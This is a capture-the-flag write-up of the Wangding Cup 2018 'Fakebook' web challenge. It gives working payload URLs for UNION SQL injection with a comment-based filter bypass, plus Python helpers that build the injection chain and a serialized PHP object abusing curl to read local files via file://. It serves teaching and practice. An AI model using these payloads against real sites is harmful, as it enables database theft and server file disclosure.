网鼎杯 (Wangding Cup) 2018 Fakebook 1 Writeup
Prerequisites
All three are covered in earlier posts:
UNION-based SQL injection
Source code disclosure (backup files, robots.txt)
PHP pseudo-protocols (file://, php://, and so on)
Walkthrough
First register an arbitrary user and log in. Clicking the username leads to /view.php?no=1. Appending a single quote to the value produces a database error, so the no parameter looks SQL-injectable. With no=1, however, every injection attempt just renders the original profile page (presumably the page shows only the first row returned, and the real row for no=1 comes before the UNION row), so use no=2 instead.
Try a UNION query. First confirm the column count:
http://fdcb238d-7970-46d5-ac9f-c93d98707d3c.node4.buuoj.cn:81/view.php?no=2%20order%20by%204#
The page renders normally, so the query has four columns. Next:
http://fdcb238d-7970-46d5-ac9f-c93d98707d3c.node4.buuoj.cn:81/view.php?no=2%20union%20select%201,2,3,4
Response: no hack ~_~
The literal union select is evidently blacklisted, so separate the two keywords with an inline comment instead of a space:
http://fdcb238d-7970-46d5-ac9f-c93d98707d3c.node4.buuoj.cn:81/view.php?no=2%20union/**/select%201,2,3,4
Column 2 is the echoed position (the 2 appears in the username field), and the age field leaks the script path /var/www/html/view.php in an error message, which gives us the web root. Now extract the database name:
http://fdcb238d-7970-46d5-ac9f-c93d98707d3c.node4.buuoj.cn:81/view.php?no=2%20union/**/select%201,database(),3,4
Response: fakebook
Next, the table names:
http://fdcb238d-7970-46d5-ac9f-c93d98707d3c.node4.buuoj.cn:81/view.php?no=2%20union/**/select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema='fakebook'
Response: users
Then the column names:
http://fdcb238d-7970-46d5-ac9f-c93d98707d3c.node4.buuoj.cn:81/view.php?no=2%20union/**/select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name='users'
Response: no,username,passwd,data,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS
The last three columns do not belong to fakebook.users: the WHERE clause filters on table_name only, so the columns of every table called users in any schema are included (performance_schema.users has exactly USER, CURRENT_CONNECTIONS and TOTAL_CONNECTIONS). Adding and table_schema='fakebook' removes the noise. The interesting column is data.
Finally, dump the data column:
http://fdcb238d-7970-46d5-ac9f-c93d98707d3c.node4.buuoj.cn:81/view.php?no=2%20union/**/select%201,(select%20group_concat(concat(data))),3,4%20from%20fakebook.users
Response: O:8:"UserInfo":3:{s:4:"name";s:2:"kb";s:3:"age";i:1;s:4:"blog";s:27:"https://kingofkb.github.io/";}
This is a PHP-serialized object of class UserInfo with three properties: name, age and blog.
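The whole enumeration chain above, collected into one payload builder. This is an added example and not part of the original writeup: it uses the same union/**/select spacing trick and the same echoed column, adds the table_schema restriction that the column query above was missing, and fetches the data column with a plain group_concat(data) from fakebook.users instead of the nested subselect used above. The blocked() function is only a model of the observed behaviour (a space-separated union select was rejected, union/**/select was accepted); the real filter in view.php is unknown, and TARGET is a placeholder for the per-instance host.

```python
"""Builder for the UNION enumeration chain against /view.php?no=.

Added example. The server-side filter model is an assumption reconstructed
from what the page observed, not the challenge's actual source.
"""
import re
from urllib.parse import quote

BASE = "http://TARGET/view.php"  # placeholder: the BUUOJ instance host differs per run

# Assumed blacklist: 'union' followed by whitespace and 'select'. The page saw
# 'union select' rejected with "no hack ~_~" and 'union/**/select' accepted.
BLOCKED = re.compile(r"union\s+select", re.IGNORECASE)


def blocked(sql: str) -> bool:
    """True if the payload would trip the assumed blacklist."""
    return BLOCKED.search(sql) is not None


def union_payload(expr: str, from_clause: str = "", *, no: int = 2,
                  ncols: int = 4, echo_pos: int = 2) -> str:
    """Place `expr` in the echoed column of a UNION row.

    no=2 because with no=1 the real row, not the UNION row, was rendered;
    ncols=4 comes from 'order by 4' succeeding; echo_pos=2 from the literal 2
    showing up in the username field. The comment between the keywords keeps
    'union' and 'select' adjacent without whitespace.
    """
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[echo_pos - 1] = expr
    sql = f"{no} union/**/select {','.join(cols)}"
    if from_clause:
        sql += f" from {from_clause}"
    return sql


def enumeration_chain(schema: str = "fakebook", table: str = "users",
                      column: str = "data") -> dict:
    """The four queries of the writeup: database -> tables -> columns -> data."""
    return {
        "database": union_payload("database()"),
        "tables": union_payload(
            "group_concat(table_name)",
            f"information_schema.tables where table_schema='{schema}'"),
        # Filtering on table_name alone also returns the columns of
        # performance_schema.users (USER, CURRENT_CONNECTIONS, TOTAL_CONNECTIONS);
        # restricting by schema keeps only fakebook.users.
        "columns": union_payload(
            "group_concat(column_name)",
            f"information_schema.columns where table_schema='{schema}' "
            f"and table_name='{table}'"),
        "data": union_payload(f"group_concat({column})", f"{schema}.{table}"),
    }


def to_url(sql: str, base: str = BASE) -> str:
    """URL-encode the payload as the value of the `no` query parameter."""
    return f"{base}?no={quote(sql, safe='/*(),=.')}"


if __name__ == "__main__":
    for step, sql in enumeration_chain().items():
        assert not blocked(sql), step
        print(f"{step:9s} {to_url(sql)}")
```

Each generated query is checked against the filter model before use; if the real blacklist turns out to be broader (for example also matching /**/), the same builder can be pointed at a different separator such as a newline or %0a.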
/robots.txt lists /user.php.bak; fetching it gives the source of the user class:
<?php
class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;   // the cast is why age is an i: (integer) in the serialized data
        $this->blog = $blog;
    }

    // Fetches an arbitrary URL with libcurl. The attacker-controlled $blog
    // ends up here, and libcurl accepts schemes such as file:// by default
    // because CURLOPT_PROTOCOLS is never restricted.
    function get($url)
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;            // the handle is never closed on this path
        }
        curl_close($ch);
        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    // Accepts only host-style URLs with an optional http(s):// prefix.
    // Presumably called at registration time; it is not consulted for the
    // object view.php unserializes, otherwise the payload below would not work.
    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }
}
The interesting method is get(): it opens a curl handle, fetches $url, and returns 404 if the HTTP status code is 404, otherwise the response body. Since $url comes straight from $this->blog and nothing restricts the allowed schemes (CURLOPT_PROTOCOLS is never set), a user-controlled blog value turns curl_exec() into an SSRF primitive, and libcurl's built-in file:// support turns that into a local file read. isValidBlog() would reject such a URL, but it is evidently not applied to the object that view.php unserializes from the data column, and we control that column directly through the UNION.
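To see exactly what the isValidBlog() regex accepts and rejects, here is a Python port of it with a few probe URLs. This is an added example, not code from the challenge or the writeup; apart from the two URLs seen on the page, the probes are constructed. PHP's PCRE and Python's re agree on every construct this pattern uses, including $ matching before a trailing newline.

```python
"""Python port of UserInfo::isValidBlog() with probe URLs.

Added example. The pattern is copied from user.php.bak (with the redundant
backslashes dropped); the probe list beyond the two URLs seen on the page
is constructed for illustration.
"""
import re

BLOG_RE = re.compile(
    r"^(((http(s?))://)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(:[0-9]+)?(/\S*)?$",
    re.IGNORECASE,
)


def is_valid_blog(blog: str) -> bool:
    """Mirror of preg_match(...) returning non-zero in the PHP class."""
    return BLOG_RE.match(blog) is not None


# Constructed probes with the result the regex should give.
PROBES = {
    "https://kingofkb.github.io/": True,       # the stored blog of user kb
    "file:///var/www/html/flag.php": False,    # the SSRF payload: no host part
    "example.com": True,                       # scheme optional; curl then defaults to http
    "http://example.com:8080/path?x=1": True,  # port and path are allowed
    "http://127.0.0.1/flag.php": False,        # TLD must be 2-6 letters, so IP literals fail
    "http://localhost/flag.php": False,        # a hostname without a dot fails
    "gopher://example.com/_x": False,          # other schemes fail on the ':'
}


def probe_results() -> dict:
    """Run every probe; returns {url: (expected, actual)}."""
    return {url: (want, is_valid_blog(url)) for url, want in PROBES.items()}


def all_probes_match() -> bool:
    """True when the port behaves as annotated for every probe."""
    return all(want == got for want, got in probe_results().values())


if __name__ == "__main__":
    for url, (want, got) in probe_results().items():
        print(f"{'ok ' if want == got else 'BAD'} {str(got):5} {url}")
```

The check would stop file:// and loopback IP literals if it were applied before the fetch; the rest of the solution works only because the object is injected into the database already serialized and never passes through this method.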
Other writeups mention that directory scanning finds flag.php (I did not find it when I did the challenge myself).
It can be read through the SSRF with a file:// URL: file:///var/www/html/flag.php (three slashes: empty authority, then the absolute path). Strictly speaking this is libcurl's own file:// scheme rather than a PHP stream wrapper, but the effect is the same.
Final payload. When a string value is changed, its s:N length prefix must be changed to the new byte length, or unserialize() fails: admin is 5 bytes and file:///var/www/html/flag.php is 29.
http://fdcb238d-7970-46d5-ac9f-c93d98707d3c.node4.buuoj.cn:81/view.php?no=2%20union/**/select%201,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:19;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
Which of the four columns gets unserialized was found by trial and error (it is the fourth, data, as the payload above shows). The fetched file is PHP source, so nothing is rendered in the browser; F12 / view source reveals:
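Because PHP's unserialize() trusts the s:N length prefixes and fails if a string is not exactly N bytes followed by ";, editing the payload by hand is error-prone. The following is an added example (mine, not code from the writeup or from PHP): it serializes the UserInfo object from its fields so the lengths are always right, and includes a small strict parser for the subset of the format used here that rejects a wrong length the way PHP does. Lengths are byte lengths, which matters as soon as a value contains multibyte characters.

```python
"""PHP serialize()/unserialize() for the subset used by the UserInfo payload.

Added example. Handles N, b, i, s and O (no arrays, no references, no
private/protected property-name mangling).
"""
from dataclasses import dataclass


@dataclass
class PhpObject:
    class_name: str
    props: dict


def php_serialize(value) -> str:
    """Produce PHP serialize() output; string lengths are UTF-8 byte counts."""
    if value is None:
        return "N;"
    if isinstance(value, bool):          # bool before int: bool is an int subclass
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        return f's:{len(value.encode("utf-8"))}:"{value}";'
    if isinstance(value, PhpObject):
        body = "".join(php_serialize(k) + php_serialize(v)
                       for k, v in value.props.items())
        return (f'O:{len(value.class_name)}:"{value.class_name}":'
                f"{len(value.props)}:{{{body}}}")
    raise TypeError(f"unsupported type {type(value).__name__}")


def _expect(buf: bytes, pos: int, token: bytes, what: str = "") -> None:
    if buf[pos:pos + len(token)] != token:
        raise ValueError(what or f"expected {token!r} at offset {pos}")


def _parse(buf: bytes, pos: int):
    tag = buf[pos:pos + 1]
    if tag == b"N":
        _expect(buf, pos + 1, b";")
        return None, pos + 2
    if tag in (b"i", b"b"):
        end = buf.index(b";", pos)
        num = int(buf[pos + 2:end])
        return (bool(num) if tag == b"b" else num), end + 1
    if tag == b"s":
        colon = buf.index(b":", pos + 2)
        n = int(buf[pos + 2:colon])
        _expect(buf, colon + 1, b'"')
        start = colon + 2
        # PHP takes exactly n bytes and then requires '";'. A stale length
        # left over from editing the string is what makes unserialize() fail.
        _expect(buf, start + n, b'";',
                f"string at offset {pos} is not {n} bytes long")
        return buf[start:start + n].decode("utf-8"), start + n + 2
    if tag == b"O":
        colon = buf.index(b":", pos + 2)
        n = int(buf[pos + 2:colon])
        _expect(buf, colon + 1, b'"')
        name = buf[colon + 2:colon + 2 + n].decode("ascii")
        pos = colon + 2 + n
        _expect(buf, pos, b'":')
        colon = buf.index(b":", pos + 2)
        count = int(buf[pos + 2:colon])
        _expect(buf, colon + 1, b"{")
        pos = colon + 2
        props = {}
        for _ in range(count):
            key, pos = _parse(buf, pos)
            val, pos = _parse(buf, pos)
            props[key] = val
        _expect(buf, pos, b"}")
        return PhpObject(name, props), pos + 1
    raise ValueError(f"unsupported tag {tag!r} at offset {pos}")


def php_unserialize(data: str):
    """Strict parser for the subset above; raises ValueError where PHP returns false."""
    buf = data.encode("utf-8")
    value, pos = _parse(buf, 0)
    if pos != len(buf):
        raise ValueError(f"trailing data at offset {pos}")
    return value


def lengths_ok(data: str) -> bool:
    """True when every length prefix in `data` matches its string."""
    try:
        php_unserialize(data)
    except ValueError:
        return False
    return True


def userinfo_payload(name: str, age: int, blog: str) -> str:
    """Serialized UserInfo with the property order of the leaked class."""
    return php_serialize(PhpObject("UserInfo",
                                   {"name": name, "age": age, "blog": blog}))


if __name__ == "__main__":
    print(userinfo_payload("admin", 19, "file:///var/www/html/flag.php"))
```

userinfo_payload("admin", 19, "file:///var/www/html/flag.php") reproduces the payload string used above byte for byte, and lengths_ok() can be run on any hand-edited variant before it is sent.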
<?php
$flag = "flag{74572b3f-2766-47bc-88c8-5ce6f094f25a}";
exit(0);
Flag: flag{74572b3f-2766-47bc-88c8-5ce6f094f25a}
References:
https://blog.csdn.net/weixin_45642610/article/details/112807706
https://blog.csdn.net/bazzza/article/details/111412288
https://www.cnblogs.com/junlebao/p/14104036.html